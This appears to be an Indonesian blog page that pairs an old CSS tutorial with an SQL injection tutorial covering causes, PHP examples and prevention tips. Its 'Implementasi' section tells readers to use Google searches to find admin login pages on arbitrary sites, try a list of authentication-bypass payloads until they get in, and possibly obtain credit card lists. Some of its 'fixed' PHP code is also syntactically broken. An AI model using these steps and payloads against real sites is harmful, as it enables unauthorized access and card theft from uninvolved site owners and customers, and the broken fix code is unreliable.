Style Sheet adalah template yang mengontrol pemformatan tag HTML pada halaman web anda. Bila anda telah terbiasa menggunakan Microsoft Word, anda dapat melihat bahwa konsep Style Sheet mirip dengan template pada Microsoft Word: anda dapat megubah penampilan pada dokumen Word dengan mengubah format pada style dokumen. Begitu pula anda dapat mengubah penampilan halaman web dengan mengubah format pada tag HTML tertentu melalui Style Sheet, untuk selanjutnya menggantikan spesifikasi default dari browser untuk tag-tag tersebut.
Anda dapat mengambil keuntungan dengan menggunakan Style Sheet ini dengan tiga alasan utama: pemformatan tambahan, kontrol yang lebih baik, dan perubahan yang lebih mudah.











Dukungan Browser




Style Sheet relatif baru pada web. Internet Explorer 3.0 keluaran Microsoft adalah web browser pertama yang mendukung Style Sheet. Implementasi Style Sheet pada Internet Explorer 3.0 berdasarkan pada draft World Wide Web Consortium (W3C) yang berjudul “Cascading Style Sheets, Level 1” (diterbitkan pada bulan Mei 1996, lihat http://www.w3.org/pub/WWW/TR/WD-css1.html). Netscape juga telah mengindikasikan bahwa mereka akan mendukung Style Sheet pada versi-versi terbaru browsernya. Browser yang tidak mendukung Style Sheet menampilkan halaman web berdasarkan spesifikasi default browser tersebut.












3 Cara Untuk Menambahkan Style Pada Web




Style Sheet dapat digunakan dengan 3 cara, sesuai dengan kebutuhan anda:
Dengan membuat link ke file Style Sheet dari file HTML. Metode seperti ini memungkinkan anda mengubah style sejumlah halaman web dengan hanya mengedit satu file Style Sheet.
Dengan menyisipkan Style Sheet pada file HTML. Metode seperti ini memungkinkan anda mengubah style suatu halaman web dengan hanya mengedit beberapa baris Style Sheet.
Dengan menyisipkan secara inline pada tag dalam file HTML. Hal ini memberi cara tercepat untuk mengubah suatu tag, sejumlah tag, atau satu blok informasi pada halaman web.
Anda dapat menggunakan satu, dua, atau ketiga cara tersebut pada halaman web.






Sintax Dasar




Baik Style Sheet yang dilink maupun yang disisipkan memiliki satu atau lebih definisi style. (Sintax inline kadang berbeda). Suatu definisi style terdiri dari suatu tag HTML (tag apapun), diikuti oleh sejumlah properti untuk tag tersebut yang terletak diantara tanda kurung kurawal. Tiap properti diidentifikasi oleh nama properti, diikuti oleh titik dua dan nilai properti. Properti ganda dipisahkan oleh titik koma. Sebagi contoh, definisi style berikut memberi tag

ukuran font yang spesifik (15 point), dan ketebalan huruf (boldface):
H1 {font-size: 15pt;
font-weight: bold}
Anda kemudian dapat membuat definisi style untuk sejumlah tag HTML dan menempatkannya pada file terpisah atau sisipkan langsung pada halaman web.









Membuat Link ke Style Sheet




Untuk membuat link ke Style Sheet eksternal, anda dapat dengan mudah membuat sebuah file berisi definisi style kemudian simpan (save) dengan ekstensi .CSS, kemudian buat link ke file tersebut dari halaman web. Dengan cara ini, anda dapat memanfaatkan Style Sheet yang sama untuk beberapa halaman dalam site anda.
Sebagai contoh, bila Style Sheet anda dinamai style-saya.css dan terletak di alamat http://alamat-internet/style-saya.css, diantara tag anda harus menambahkan:

Judul artikel
HREF="http://alamat-internet/style-saya.css"
TYPE="text/css">









Menyisipkan blok STYLE




Untuk menyisipkan (embed) Style Sheet, tambahkan blok di awal dokumen, di antara tag-tag dan . Hal ini memungkinkan anda unutk mengubah penampilan satu halaman web. Tag .



...




Menggunakan inline style




Bila anda menginginkan pemformatan pada sebagian kecil saja dari web anda, anda dapat menggunakan inline style.
Definisi style pada inline style hanya berpengaruh pada tag dimana inline style tersebut berada. Contoh inline style pada tag

berikut:


This line will be indented on the left and right.


This line will receive no indentation.
Hasilnya akan terlihat seperti ini


This line will be indented on the left and right.



This line will receive no indentation.






Opsi Tambahan

Sederhanakan melalui pengelompokkan
Bila anda ingin menerapkan pemformatan yang sama bagi berbagai tag, misal:
H1 {font-size: 15pt;
font-weight: bold;
color: maroon}
H2 {font-size: 15pt;
font-weight: bold;
color: maroon}
H3 {font-size: 15pt;
font-weight: bold;
color: maroon}
anda dapat mengelompokkannya menjadi
H1, H2, H3
{font-size: 15pt;
font-weight: bold;
color: maroon}

Anda dapat pula mengelompokkan spesifikasi pemformatan. Misal:
H1 {font-size: 15pt;
line-height: 17pt;
font-weight: bold;
font-family: "Arial"
font-style: normal}
dapat disederhanakan menjadi seperti berikut ini
H1 {font:
15pt/17pt bold "Arial" normal}
Variasi melalui class
Gunakan class untuk membuat berbagai macam variasi bagi satu tag HTML. Sebagi contoh, bila anda ingin menggunakan tiga warna untuk heading H1 (katakanlah bergantung pada konteks), anda dapat mendefinisikannnya dalam tiga class dalam STYLE tag berikut:

Pada halaman web gunakan class tersebut

This is the red heading


...

This is the blue heading


...

You get the picture...











Link
Implementasi Style Sheet juga memungkinkan anda mengubah penampilan dari link (teks yang diklik oleh user untuk lompat ke halaman lain) dengan memberikan dua class yang telah didefinisikan pada tag :
A:link menunjukkan link yang belum dikunjungi
A:visited menunjukkan link yang telah diklik/dikunjungi oleh user
Anda dapat mengeset sejumlah properti pemformatan teks pada class-class A tersebut, termasuk color, Font-size, font-weight, dan text-decoration. Sebagai contoh, untuk menentukan warna yang spesifik pada tiga tipe link, anda dapat menspesifikasi:
A:link {color: red}
A:visited {color: blue}
A:active {color: orange}
Dengan menambahkan text-decoration “none” menghilangkan garis bawah pada teks link
A:visited {color: blue; text-decoration: none}

Komentar
Anda dapat menambahkan komentar pada Style Sheet. Komentar dapat ditulis pada baris manapun dalam spesifikasi style di antara tanda /* dan */ misal:
H1 {font: 20pt/22pt
bold; color=#00FF00} /* Hijau untuk heading 1 */




Penutup




Anda dapat segera mempraktekkan berbagai kelebihan Cascading Style Sheets pada web anda. Browser-browser terkenal seperti Microsoft Internet Explorer dan Netscape Navigator versi terbaru telah mendukung Cascading Style Sheets.
Mulailah menjelajah web dan temukan berbagai bacaan mengenai Cascading Style Sheets untuk mengasah kemampuan anda. Dokumentasi dan manual Cascading Style Sheets terdapat di situs web World Wide Web Consortium http://www.w3.org/












Referensi Style



Atribut Deskripsi Nilai Contoh
font-size Sets size of text. points (pt)
inches (in)
centimeters (cm)
pixels (px) {font-size: 12pt}
font-family Sets typeface. typeface name
font family name {font-family: courier}
font-weight Sets thickness of type. extra-light
light
demi-light
medium
demi-bold
bold
extra-bold {font-weight: bold}
font-style Italicizes text. normal
italic {font-style: italic}
line-height Sets the distance between baselines. points (pt)
inches (in)
centimeters (cm)
pixels (px)
percentage (%) {line-height: 24pt}
color Sets color of text. color-name
RGB triplet {color: blue}
text-decoration Underlines or otherwise highlights text. none
underline
italic
line-through {text-decoration: underline}
margin-left Sets distance from left edge of page. points (pt)
inches (in)
centimeters (cm)
pixels (px)* {margin-left: 1in}
margin-right Sets distance from right edge of page. points (pt)
inches (in)
centimeters (cm)
pixels (px)* {margin-right: 1in}
margin-top Sets distance from top edge of page. points (pt)
inches (in)
centimeters (cm)
pixels (px)* {margin-top: -20px}
text-align Sets justification. left
center
right {text-align: right}
text-indent Sets distance from left margin. points (pt)
inches (in)
centimeters (cm)
pixels (px)* {text-indent: 0.5in}
background Sets background images or colors. URL,
color-name
RGB triplet {background: #33CC00}



Read more...

TUTORIAL SQL INJECTION


Masukkan Code ini K1-E2A8B8-E
untuk berbelanja di KutuKutuBuku.com





Pengertian SQL Injection
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Sebab terjadinya SQL Injection
Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

Bug SQL Injection berbahaya ?
Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.


Apa saja yang diperlukan untuk melakukan SQL Injection ?
Internet Exploler / Browser
PC yang terhubung internet
Program atau software seperti softice



Contoh sintaks SQL Injection
Contoh sintak SQL dalam PHP
$SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
isikan password dengan string ’ or ’’ = ’
hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL

Gambar contoh SQL Injection




Contoh sintaks SQL Injection
Sintaks SQL string ‘-- setelah nama username
Query database awal :




Berubah menjadi :




Contoh sintaks SQL Injection
SQL Injection melalui URL, contohnya :


Penanganan SQL Injection
Merubah script php
Menggunakan MySQL_escape_string
Pemfilteran karakter ‘ dengan memodifikasi php.ini

1. Merubah script php
Contoh script php semula :
$query = "select id,name,email,password,type,block from user " .
"where email = '$Email' and password = '$Password'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "\n";
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :



Maka dilakukan perubahan script menjadi :
$query = "select id,name,email,password,type,block from user".
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "\n";
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));
2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :


3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :




Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection
Masuk ke google atau browse yg lain
Masukkan salah satu keyword berikut
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}


Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
Masukkan kode berikut :
User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)
Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION
Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.


Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.

R E F E R E N S I
-------------, SQLinjection, (www.BlackAngels.it).
-------------, Advanced SQL injection in SQL server applications, (www.ngssoftware.com).
-------------, SQL injection walktrough (www.securiteam.com).
BM-100, ”Hacking hiltonjakarta.com (SQL Injection)”, 24 Juli 2005, (http://www.jasakom.com).
Budi Raharjo, ”Keamanan Sistem Informasi Berbasis Internet”, PT Insan Indonesia & PT INDOCISC, Jakarta,2002.





Read more...